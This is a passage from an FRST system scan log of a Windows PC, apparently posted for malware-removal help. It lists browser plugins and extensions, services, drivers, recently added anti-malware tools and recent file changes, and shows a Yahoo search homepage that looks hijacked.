Handler-x32: mso-minsb-roaming.16 - {83C25742-A9F7-49FB-9138-434302C88D07} - C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\MSOSB.DLL [2016-01-17] (Microsoft Corporation)
Handler: mso-minsb.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files\Microsoft Office\root\Office16\MSOSB.DLL [2016-01-17] (Microsoft Corporation)
Handler-x32: mso-minsb.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\MSOSB.DLL [2016-01-17] (Microsoft Corporation)
Handler: osf-roaming.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files\Microsoft Office\root\Office16\MSOSB.DLL [2016-01-17] (Microsoft Corporation)
Handler-x32: osf-roaming.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\MSOSB.DLL [2016-01-17] (Microsoft Corporation)
Handler: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files\Microsoft Office\root\Office16\MSOSB.DLL [2016-01-17] (Microsoft Corporation)
Handler-x32: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\MSOSB.DLL [2016-01-17] (Microsoft Corporation)
 
FireFox:
========
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> C:\Program Files\Microsoft Silverlight\5.1.41212.0\npctrl.dll [2015-12-11] ( Microsoft Corporation)
FF Plugin: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files\Microsoft Office\root\Office16\NPSPWRAP.DLL [2016-01-17] (Microsoft Corporation)
FF Plugin: @videolan.org/vlc,version=2.2.1 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2015-04-16] (VideoLAN)
FF Plugin: nuance.com/DgnRia2_x86_64 -> C:\Program Files (x86)\Nuance\NaturallySpeaking13\Program\x64\npDgnRia2_x64.dll [2014-07-12] (Nuance Communications, Inc.)
FF Plugin-x32: @Apple.com/iTunes,version=1.0 -> C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll [2015-10-14] ()
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> C:\Program Files (x86)\Microsoft Silverlight\5.1.41212.0\npctrl.dll [2015-12-11] ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\NPSPWRAP.DLL [2016-01-17] (Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.29.5\npGoogleUpdate3.dll [2016-02-02] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.29.5\npGoogleUpdate3.dll [2016-02-02] (Google Inc.)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2015-12-18] (Adobe Systems Inc.)
FF Plugin-x32: nuance.com/DgnRia2 -> C:\Program Files (x86)\Nuance\NaturallySpeaking13\Program\npDgnRia2.dll [2014-07-12] (Nuance Communications, Inc.)
FF HKLM-x32\...\Firefox\Extensions: [[email protected]] - C:\Program Files (x86)\Epson Software\E-Web Print\Firefox Add-on
FF Extension: E-Web Print - C:\Program Files (x86)\Epson Software\E-Web Print\Firefox Add-on [2015-12-14] [not signed]
 
Chrome: 
=======
CHR HomePage: Default -> hxxps://uk.search.yahoo.com/yhs/web?hspart=iry&hsimp=yhs-fullyhosted_003&type=wncy_mdaffmarmarie_16_03&param1=1&param2=f%3D1%26b%3DChrome%26cc%3Dgb%26pa%3DWincy%26cd%3D2XzuyEtN2Y1L1QzuyDzztBtD0BtC0DzzyD0D0C0DtByDyDtBtN0D0Tzu0StCyEzztBtN1L2XzutAtFtCyBtFzytFtDtN1L1Czu1StN1L1G1B1V1N2Y1L1Qzu2SyDtBtCyByB0DyByEtGyByC0A0AtG0B0EyBtDtGtC0F0AtBtG0B0CyBzztB0FtC0F0DtDyD0A2QtN1M1F1B2Z1V1N2Y1L1Qzu2SzytD0BtBtByD0B0BtGyEtA0BtCtGyEyCyE0AtGzzzy0BtCtGzz0B0B0A0DtD0E0C0F0E0Czz2QtN0A0LzutB%26cr%3D167945445%26a%3Dwncy_mdaffmarmarie_16_03%26os_ver%3D6.3%26os%3DWindows%2B8.1%2BPro
CHR StartupUrls: Default -> "hxxps://www.google.co.uk/","hxxp://www.uea.ac.uk/is/portal","hxxp://en-gb.facebook.com/"
CHR Profile: C:\Users\Molly Poole\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (Google Slides) - C:\Users\Molly Poole\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2015-12-14]
CHR Extension: (Google Docs) - C:\Users\Molly Poole\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2016-01-31]
CHR Extension: (Google Drive) - C:\Users\Molly Poole\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2016-01-31]
CHR Extension: (YouTube) - C:\Users\Molly Poole\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2016-01-31]
CHR Extension: (Google Search) - C:\Users\Molly Poole\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2016-01-31]
CHR Extension: (Google Sheets) - C:\Users\Molly Poole\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2015-12-14]
CHR Extension: (Google Docs Offline) - C:\Users\Molly Poole\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2016-01-31]
CHR Extension: (AdBlock) - C:\Users\Molly Poole\AppData\Local\Google\Chrome\User Data\Default\Extensions\gighmmpiobklfepjocnamgkkbiglidom [2016-02-07]
CHR Extension: (Unlimited Free VPN - Hola) - C:\Users\Molly Poole\AppData\Local\Google\Chrome\User Data\Default\Extensions\gkojfkhlekighikafcpjkiklfbnlmeio [2016-02-09]
CHR Extension: (Nebula) - C:\Users\Molly Poole\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlmflgnnmmojlnbmaokpfcjdkhkjbnok [2016-02-01]
CHR Extension: (Chrome Web Store Payments) - C:\Users\Molly Poole\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2015-12-14]
CHR Extension: (Hola - Unlimited Proxy VPN) - C:\Users\Molly Poole\AppData\Local\Google\Chrome\User Data\Default\Extensions\opalpjjboefohnelaemnhdhlceibbcgl [2016-01-31]
CHR Extension: (Gmail) - C:\Users\Molly Poole\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2016-01-31]
 
==================== Services (Whitelisted) ========================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
R2 Apple Mobile Device Service; C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe [77104 2015-10-07] (Apple Inc.)
R2 ClickToRunSvc; C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe [2772720 2016-01-17] (Microsoft Corporation)
R2 DragonLoggerService; C:\Program Files (x86)\Common Files\Nuance\loggerservice.exe [137280 2014-07-12] (Nuance Communications, Inc.)
R2 EpsonScanSvc; C:\Windows\system32\EscSvc64.exe [144560 2012-05-17] (Seiko Epson Corporation)
R2 HPSupportSolutionsFrameworkService; C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\HPSupportSolutionsFrameworkService.exe [25800 2015-09-28] (Hewlett-Packard Company)
R2 igfxCUIService1.0.0.0; C:\Windows\system32\igfxCUIService.exe [328296 2014-10-17] (Intel Corporation)
R2 MBAMScheduler; D:\Users\Molly Poole\Desktop\Malwarebytes Anti-Malware\mbamscheduler.exe [1513784 2015-10-05] (Malwarebytes)
R2 MBAMService; D:\Users\Molly Poole\Desktop\Malwarebytes Anti-Malware\mbamservice.exe [1135416 2015-10-05] (Malwarebytes)
R2 MyEpson Portal Service; C:\Program Files (x86)\EPSON\MyEpson Portal\mepService.exe [703984 2014-09-22] (SEIKO EPSON CORPORATION)
S3 Olympus DVR Service; C:\Program Files (x86)\Common Files\Olympus Shared\DeviceManager\olydvrsv.exe [174592 2012-11-08] (OLYMPUS IMAGING CORP.) [File not signed]
R2 RtkAudioService; C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe [293080 2015-08-04] (Realtek Semiconductor)
S2 SpxDictService; C:\Program Files (x86)\Spellex\Spellex Dictation\SpxDictService.exe [17920 2015-02-12] () [File not signed]
R2 SynTPEnhService; C:\Program Files\Synaptics\SynTP\SynTPEnhService.exe [191728 2014-04-11] (Synaptics Incorporated)
R2 valWBFPolicyService; C:\Windows\system32\valWBFPolicyService.exe [41472 2014-01-01] (Validity Sensors, Inc.) [File not signed]
R3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [366552 2015-10-07] (Microsoft Corporation)
R2 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [23824 2015-10-07] (Microsoft Corporation)
 
===================== Drivers (Whitelisted) ==========================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
S0 ebdrv; C:\Windows\System32\drivers\evbda.sys [3357024 2013-08-22] (Broadcom Corporation)
R3 MBAMProtector; C:\Windows\system32\drivers\mbam.sys [25816 2015-10-05] (Malwarebytes)
R3 MBAMSwissArmy; C:\Windows\system32\drivers\MBAMSwissArmy.sys [192216 2016-02-09] (Malwarebytes)
R3 MBAMWebAccessControl; C:\Windows\system32\drivers\mwac.sys [64216 2015-10-05] (Malwarebytes Corporation)
R3 MEIx64; C:\Windows\system32\DRIVERS\TeeDriverx64.sys [126976 2014-09-03] (Intel Corporation)
S3 RTSPER; C:\Windows\system32\DRIVERS\RtsPer.sys [508120 2014-08-15] (Realsil Semiconductor Corporation)
R3 RTWlanE; C:\Windows\system32\DRIVERS\rtwlane.sys [3556056 2014-10-28] (Realtek Semiconductor Corporation                           )
R3 SmbDrvI; C:\Windows\system32\DRIVERS\Smb_driver_Intel.sys [31472 2014-04-11] (Synaptics Incorporated)
S0 WdBoot; C:\Windows\System32\drivers\WdBoot.sys [44560 2015-10-07] (Microsoft Corporation)
R0 WdFilter; C:\Windows\System32\drivers\WdFilter.sys [270168 2015-10-07] (Microsoft Corporation)
R2 WdNisDrv; C:\Windows\System32\Drivers\WdNisDrv.sys [114520 2015-10-07] (Microsoft Corporation)
R3 WirelessButtonDriver; C:\Windows\System32\drivers\WirelessButtonDriver64.sys [20288 2012-08-03] (Hewlett-Packard Development Company, L.P.)
 
==================== NetSvcs (Whitelisted) ===================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
 
==================== One Month Created files and folders ========
 
(If an entry is included in the fixlist, the file/folder will be moved.)
 
2016-02-09 17:35 - 2016-02-09 17:35 - 00000000 ____D C:\Program Files (x86)\ESET
2016-02-09 16:44 - 2016-02-09 17:40 - 00192216 _____ (Malwarebytes) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2016-02-09 16:44 - 2016-02-09 16:44 - 00000674 _____ C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2016-02-09 16:44 - 2016-02-09 16:44 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2016-02-09 16:44 - 2016-02-09 16:44 - 00000000 ____D C:\ProgramData\Malwarebytes
2016-02-09 16:44 - 2015-10-05 09:50 - 00109272 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbamchameleon.sys
2016-02-09 16:44 - 2015-10-05 09:50 - 00064216 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mwac.sys
2016-02-09 16:44 - 2015-10-05 09:50 - 00025816 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbam.sys
2016-02-09 15:44 - 2016-02-09 15:48 - 00000000 ____D C:\AdwCleaner
2016-02-09 14:28 - 2016-02-09 14:28 - 00000000 ____D C:\Users\Molly Poole\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Revo Uninstaller
2016-02-09 11:48 - 2016-02-09 21:10 - 00000000 ____D C:\FRST
2016-01-31 19:25 - 2016-02-05 13:33 - 00002210 _____ C:\Users\Public\Desktop\Google Chrome.lnk
2016-01-28 20:46 - 2016-01-28 20:46 - 00000000 ____D C:\Program Files\Common Files\DESIGNER
2016-01-22 18:57 - 2016-01-22 18:57 - 00000000 ____D C:\ProgramData\Unchecky
2016-01-19 12:50 - 2016-01-19 12:50 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Sonocent Audio Notetaker
2016-01-19 12:50 - 2016-01-19 12:50 - 00000000 ____D C:\Program Files (x86)\Sonocent
2016-01-12 22:03 - 2015-12-10 00:40 - 00033456 _____ (Microsoft Corporation) C:\Windows\system32\CompatTelRunner.exe
2016-01-12 22:03 - 2015-11-17 21:07 - 01380864 _____ (Microsoft Corporation) C:\Windows\system32\appraiser.dll
2016-01-12 22:03 - 2015-11-17 21:07 - 01164800 _____ (Microsoft Corporation) C:\Windows\system32\aeinv.dll
2016-01-12 22:03 - 2015-11-17 21:07 - 00792064 _____ (Microsoft Corporation) C:\Windows\system32\generaltel.dll
2016-01-12 22:03 - 2015-11-17 21:07 - 00705024 _____ (Microsoft Corporation) C:\Windows\system32\invagent.dll
2016-01-12 22:03 - 2015-11-17 21:07 - 00505344 _____ (Microsoft Corporation) C:\Windows\system32\devinv.dll
2016-01-12 22:03 - 2015-11-17 21:07 - 00210432 _____ (Microsoft Corporation) C:\Windows\system32\aepic.dll
2016-01-12 22:03 - 2015-11-17 21:07 - 00076800 _____ (Microsoft Corporation) C:\Windows\system32\acmigration.dll
2016-01-12 20:54 - 2015-12-11 04:38 - 25837568 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2016-01-12 20:54 - 2015-12-11 04:00 - 00571904 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll
2016-01-12 20:54 - 2015-12-11 03:55 - 06051328 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll
2016-01-12 20:54 - 2015-12-11 03:50 - 20367360 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.dll
2016-01-12 20:54 - 2015-12-11 03:45 - 00817664 _____ (Microsoft Corporation) C:\Windows\system32\jscript.dll
2016-01-12 20:54 - 2015-12-11 03:21 - 00496640 _____ (Microsoft Corporation) C:\Windows\SysWOW64\vbscript.dll
2016-01-12 20:54 - 2015-12-11 03:18 - 00092160 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll
2016-01-12 20:54 - 2015-12-11 03:09 - 01032704 _____ (Microsoft Corporation) C:\Windows\system32\inetcomm.dll
2016-01-12 20:54 - 2015-12-11 03:09 - 00663552 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript.dll
2016-01-12 20:54 - 2015-12-11 03:03 - 14456832 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll
2016-01-12 20:54 - 2015-12-11 02:59 - 00798208 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll
2016-01-12 20:54 - 2015-12-11 02:43 - 04610560 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9.dll
2016-01-12 20:54 - 2015-12-11 02:43 - 00880128 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inetcomm.dll
2016-01-12 20:54 - 2015-12-11 02:38 - 02487808 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll
2016-01-12 20:54 - 2015-12-11 02:37 - 00687104 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeeds.dll
2016-01-12 20:54 - 2015-12-11 02:35 - 12856320 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieframe.dll
2016-01-12 20:54 - 2015-12-11 02:26 - 01546752 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll
2016-01-12 20:54 - 2015-12-11 02:14 - 00800768 _____ (Microsoft Corporation) C:\Windows\system32\ieapfltr.dll
2016-01-12 20:54 - 2015-12-11 02:12 - 02011136 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wininet.dll
2016-01-12 20:54 - 2015-12-11 02:08 - 01311744 _____ (Microsoft Corporation) C:\Windows\SysWOW64\urlmon.dll
2016-01-12 20:54 - 2015-12-11 02:07 - 00710144 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieapfltr.dll
2016-01-12 20:53 - 2015-12-30 19:32 - 07453016 _____ (Microsoft Corporation) C:\Windows\system32\ntoskrnl.exe
2016-01-12 20:53 - 2015-12-30 19:32 - 01735000 _____ (Microsoft Corporation) C:\Windows\system32\ntdll.dll
2016-01-12 20:53 - 2015-12-30 19:32 - 01499912 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntdll.dll
2016-01-12 20:53 - 2015-12-07 10:56 - 01380600 _____ (Microsoft Corporation) C:\Windows\system32\gdi32.dll
2016-01-12 20:53 - 2015-12-05 05:58 - 02745184 _____ (Microsoft Corporation) C:\Windows\system32\WMVDECOD.DLL
2016-01-12 20:53 - 2015-12-05 05:58 - 02528784 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WMVDECOD.DLL
2016-01-12 20:53 - 2015-12-05 05:58 - 02450240 _____ (Microsoft Corporation) C:\Windows\system32\WMVENCOD.DLL
2016-01-12 20:53 - 2015-12-05 05:58 - 02447136 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WMVENCOD.DLL
2016-01-12 20:53 - 2015-12-05 05:58 - 02334104 _____ (Microsoft Corporation) C:\Windows\system32\mfcore.dll
2016-01-12 20:53 - 2015-12-05 05:58 - 02324744 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfcore.dll
2016-01-12 20:53 - 2015-12-05 05:58 - 01877504 _____ (Microsoft Corporation) C:\Windows\system32\msmpeg2adec.dll
2016-01-12 20:53 - 2015-12-05 05:58 - 01798480 _____ (Microsoft Corporation) C:\Windows\system32\WMALFXGFXDSP.dll
2016-01-12 20:53 - 2015-12-05 05:58 - 01484888 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msmpeg2adec.dll
2016-01-12 20:53 - 2015-12-05 05:58 - 01288128 _____ (Microsoft Corporation) C:\Windows\system32\mfnetsrc.dll
2016-01-12 20:53 - 2015-12-05 05:58 - 01210200 _____ (Microsoft Corporation) C:\Windows\system32\WMADMOD.DLL
2016-01-12 20:53 - 2015-12-05 05:58 - 01150232 _____ (Microsoft Corporation) C:\Windows\system32\WMADMOE.DLL
2016-01-12 20:53 - 2015-12-05 05:58 - 01115640 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfnetsrc.dll
2016-01-12 20:53 - 2015-12-05 05:58 - 01037680 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WMADMOD.DLL
2016-01-12 20:53 - 2015-12-05 05:58 - 00914672 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WMADMOE.DLL
2016-01-12 20:53 - 2015-12-05 05:58 - 00850680 _____ (Microsoft Corporation) C:\Windows\system32\mfnetcore.dll
2016-01-12 20:53 - 2015-12-05 05:58 - 00735496 _____ (Microsoft Corporation) C:\Windows\system32\evr.dll
2016-01-12 20:53 - 2015-12-05 05:58 - 00700360 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfnetcore.dll
2016-01-12 20:53 - 2015-12-05 05:58 - 00629600 _____ (Microsoft Corporation) C:\Windows\system32\MP4SDECD.DLL
2016-01-12 20:53 - 2015-12-05 05:58 - 00584656 _____ (Microsoft Corporation) C:\Windows\SysWOW64\evr.dll
2016-01-12 20:53 - 2015-12-05 05:58 - 00557856 _____ (Microsoft Corporation) C:\Windows\system32\WMVSDECD.DLL
2016-01-12 20:53 - 2015-12-05 05:58 - 00498472 _____ (Microsoft Corporation) C:\Windows\system32\mfsvr.dll
2016-01-12 20:53 - 2015-12-05 05:58 - 00492736 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WMVSDECD.DLL
2016-01-12 20:53 - 2015-12-05 05:58 - 00463776 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MP4SDECD.DLL
2016-01-12 20:53 - 2015-12-05 05:58 - 00399776 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfsvr.dll
2016-01-12 20:53 - 2015-12-05 05:58 - 00299080 _____ (Microsoft Corporation) C:\Windows\system32\VIDRESZR.DLL
2016-01-12 20:53 - 2015-12-05 05:58 - 00275312 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MPG4DECD.DLL
2016-01-12 20:53 - 2015-12-05 05:58 - 00274280 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MP43DECD.DLL
2016-01-12 20:53 - 2015-12-05 05:58 - 00250520 _____ (Microsoft Corporation) C:\Windows\system32\MPG4DECD.DLL
2016-01-12 20:53 - 2015-12-05 05:58 - 00248432 _____ (Microsoft Corporation) C:\Windows\system32\MP43DECD.DLL
2016-01-12 20:53 - 2015-12-05 05:58 - 00246856 _____ (Microsoft Corporation) C:\Windows\system32\RESAMPLEDMO.DLL
2016-01-12 20:53 - 2015-12-05 05:58 - 00244296 _____ (Microsoft Corporation) C:\Windows\system32\mfps.dll
2016-01-12 20:53 - 2015-12-05 05:58 - 00229272 _____ (Microsoft Corporation) C:\Windows\SysWOW64\RESAMPLEDMO.DLL
2016-01-12 20:53 - 2015-12-05 05:58 - 00203016 _____ (Microsoft Corporation) C:\Windows\system32\COLORCNV.DLL
2016-01-12 20:53 - 2015-12-05 05:58 - 00184912 _____ (Microsoft Corporation) C:\Windows\SysWOW64\COLORCNV.DLL
2016-01-12 20:53 - 2015-12-05 05:58 - 00183856 _____ (Microsoft Corporation) C:\Windows\SysWOW64\VIDRESZR.DLL
2016-01-12 20:53 - 2015-12-05 05:58 - 00116720 _____ (Microsoft Corporation) C:\Windows\system32\MP3DMOD.DLL
2016-01-12 20:53 - 2015-12-05 05:58 - 00110544 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfps.dll
2016-01-12 20:53 - 2015-12-05 05:58 - 00099136 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MP3DMOD.DLL
2016-01-12 20:53 - 2015-12-05 05:58 - 00090904 _____ (Microsoft Corporation) C:\Windows\system32\devenum.dll
2016-01-12 20:53 - 2015-12-05 05:58 - 00090392 _____ (Microsoft Corporation) C:\Windows\system32\mfvdsp.dll
2016-01-12 20:53 - 2015-12-05 05:58 - 00081032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\devenum.dll
2016-01-12 20:53 - 2015-12-05 05:58 - 00076936 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfvdsp.dll
2016-01-12 20:53 - 2015-12-04 15:00 - 01097216 _____ (Microsoft Corporation) C:\Windows\SysWOW64\gdi32.dll
2016-01-12 20:53 - 2015-12-03 19:42 - 00561952 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\cng.sys
2016-01-12 20:53 - 2015-12-03 19:42 - 00397224 _____ (Microsoft Corporation) C:\Windows\system32\bcryptprimitives.dll
2016-01-12 20:53 - 2015-12-03 19:42 - 00137968 _____ (Microsoft Corporation) C:\Windows\system32\ncrypt.dll
2016-01-12 20:53 - 2015-12-03 19:42 - 00106960 _____ (Microsoft Corporation) C:\Windows\system32\ncryptsslp.dll
2016-01-12 20:53 - 2015-12-03 19:41 - 00177488 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ksecpkg.sys
2016-01-12 20:53 - 2015-12-03 18:52 - 00340872 _____ (Microsoft Corporation) C:\Windows\SysWOW64\bcryptprimitives.dll
2016-01-12 20:53 - 2015-12-03 18:52 - 00120376 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ncrypt.dll
2016-01-12 20:53 - 2015-12-03 18:52 - 00091416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ncryptsslp.dll
2016-01-12 20:53 - 2015-12-03 18:28 - 00401920 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb.sys
2016-01-12 20:53 - 2015-12-03 18:28 - 00202240 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb20.sys
2016-01-12 20:53 - 2015-12-03 18:07 - 00340992 _____ (Microsoft Corporation) C:\Windows\system32\qdvd.dll
2016-01-12 20:53 - 2015-12-03 18:07 - 00289792 _____ (Microsoft Corporation) C:\Windows\system32\ksproxy.ax
2016-01-12 20:53 - 2015-12-03 18:05 - 00644608 _____ (Microsoft Corporation) C:\Windows\system32\WMVXENCD.DLL
2016-01-12 20:53 - 2015-12-03 18:02 - 01664000 _____ (Microsoft Corporation) C:\Windows\system32\WMSPDMOE.DLL
2016-01-12 20:53 - 2015-12-03 18:00 - 00451072 _____ (Microsoft Corporation) C:\Windows\system32\WMVSENCD.DLL
2016-01-12 20:53 - 2015-12-03 17:58 - 00378880 ____C (Microsoft Corporation) C:\Windows\system32\SysFxUI.dll
2016-01-12 20:53 - 2015-12-03 17:51 - 00445440 _____ (Microsoft Corporation) C:\Windows\system32\certcli.dll
2016-01-12 20:53 - 2015-12-03 17:36 - 01697792 _____ (Microsoft Corporation) C:\Windows\system32\quartz.dll
2016-01-12 20:53 - 2015-12-03 17:30 - 00468480 _____ (Microsoft Corporation) C:\Windows\system32\MFWMAAEC.DLL
2016-01-12 20:53 - 2015-12-03 17:28 - 00519680 _____ (Microsoft Corporation) C:\Windows\SysWOW64\qdvd.dll
2016-01-12 20:53 - 2015-12-03 17:28 - 00245760 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ksproxy.ax
2016-01-12 20:53 - 2015-12-03 17:27 - 00736256 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WMVXENCD.DLL
2016-01-12 20:53 - 2015-12-03 17:24 - 01411584 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WMSPDMOE.DLL
2016-01-12 20:53 - 2015-12-03 17:23 - 00402432 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WMVSENCD.DLL
2016-01-12 20:53 - 2015-12-03 17:16 - 00324096 _____ (Microsoft Corporation) C:\Windows\SysWOW64\certcli.dll
2016-01-12 20:53 - 2015-12-03 17:13 - 01441280 _____ (Microsoft Corporation) C:\Windows\system32\lsasrv.dll
2016-01-12 20:53 - 2015-12-03 17:07 - 00432128 _____ (Microsoft Corporation) C:\Windows\system32\schannel.dll
2016-01-12 20:53 - 2015-12-03 17:06 - 01501184 _____ (Microsoft Corporation) C:\Windows\SysWOW64\quartz.dll
2016-01-12 20:53 - 2015-12-03 17:01 - 00743936 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MFWMAAEC.DLL
2016-01-12 20:53 - 2015-12-03 16:45 - 00357888 _____ (Microsoft Corporation) C:\Windows\SysWOW64\schannel.dll
2016-01-12 20:53 - 2015-12-03 16:40 - 01010688 _____ (Microsoft Corporation) C:\Windows\system32\WMSPDMOD.DLL
2016-01-12 20:53 - 2015-12-03 16:29 - 00887296 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WMSPDMOD.DLL
2016-01-12 20:53 - 2015-12-02 15:04 - 00670208 _____ (Microsoft Corporation) C:\Windows\system32\qedit.dll
2016-01-12 20:53 - 2015-12-02 15:01 - 00561664 _____ (Microsoft Corporation) C:\Windows\SysWOW64\qedit.dll
2016-01-12 20:52 - 2015-12-08 19:08 - 00685432 _____ (Microsoft Corporation) C:\Windows\system32\advapi32.dll
2016-01-12 20:52 - 2015-12-08 19:07 - 00507176 _____ (Microsoft Corporation) C:\Windows\SysWOW64\advapi32.dll
 
==================== One Month Modified files and folders ========
 
(If an entry is included in the fixlist, the file/folder will be moved.)
 
2016-02-09 18:21 - 2015-12-08 09:24 - 00003598 _____ C:\Windows\System32\Tasks\Optimize Start Menu Cache Files-S-1-5-21-1343854479-873069186-2863876452-1002
2016-02-09 17:39 - 2015-12-14 13:39 - 00000937 _____ C:\Windows\Tasks\EPSON XP-322 323 325 Series Update {3F135F97-7E6C-46D6-BBA8-E64BB4DD38C1}.job
2016-02-09 17:38 - 2015-12-14 13:38 - 00000937 _____ C:\Windows\Tasks\EPSON XP-322 323 325 Series Update {178A5127-B7E2-4709-B44E-4F2F52BA4C65}.job
2016-02-09 17:31 - 2015-10-07 13:32 - 00000924 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
2016-02-09 17:25 - 2015-12-08 11:54 - 00003950 _____ C:\Windows\System32\Tasks\User_Feed_Synchronization-{D813D5A7-8FB5-485D-B469-BE69E474CFFF}
2016-02-09 17:19 - 2015-12-14 14:01 - 00000000 __RDO C:\Users\Molly Poole\OneDrive
2016-02-09 17:18 - 2015-10-07 13:32 - 00000920 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
2016-02-09 17:18 - 2013-08-22 14:45 - 00000006 ____H C:\Windows\Tasks\SA.DAT
2016-02-09 17:01 - 2013-08-22 13:36 - 00000000 ____D C:\Windows\Inf
2016-02-09 16:57 - 2015-12-08 09:17 - 00000000 ____D C:\Users\Molly Poole\AppData\Local\Packages
2016-02-09 15:49 - 2013-08-22 13:25 - 00524288 ___SH C:\Windows\system32\config\BBI
2016-02-09 10:04 - 2015-12-08 10:21 - 00000000 ____D C:\ProgramData\TEMP
2016-02-07 20:32 - 2013-08-22 15:36 - 00000000 ____D C:\Windows\AppReadiness
